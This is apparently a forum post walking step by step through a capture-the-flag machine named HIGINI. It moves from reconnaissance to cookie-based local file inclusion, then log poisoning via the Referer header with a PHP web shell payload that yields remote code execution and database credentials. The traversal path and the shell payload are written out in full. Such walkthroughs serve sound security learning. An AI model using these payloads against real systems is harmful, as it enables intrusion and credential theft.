Just knocked over HIGINI if anyone is interested.
This is basically the approach I took step by step:
- nmap -> find ports 22+80
- View source -> find creds ‘test’ and ‘test’. Enter creds but they don’t go far. Some page called ‘expenses.php’ which doesn’t exist (useful later )
- Hit up ‘/robots.txt’. Find /dev.
- Download pages -> note obvious LFI from the ‘users’ cookie. Guess that the same pages in /dev are available in /. Test with …/…/…/…/etc/passwd as the user cookie and the LFI works
- Using the path /proc/self/fd/2 shows the error log. Note the instance of the ‘referer’ header being written out - particularly when the expenses.php file can’t be found
- Login in again but this time polluting the referer header with the <?php echo('thisworks!'); system($_GET['cmd']); ?> string set.
- Reroll the 5th step - note the ‘thisworks!’ string being printed.
- Passing in cmd=ls as the query yields RCE.
DB credentials can be found at this point.
Don’t see obvious privesc yet.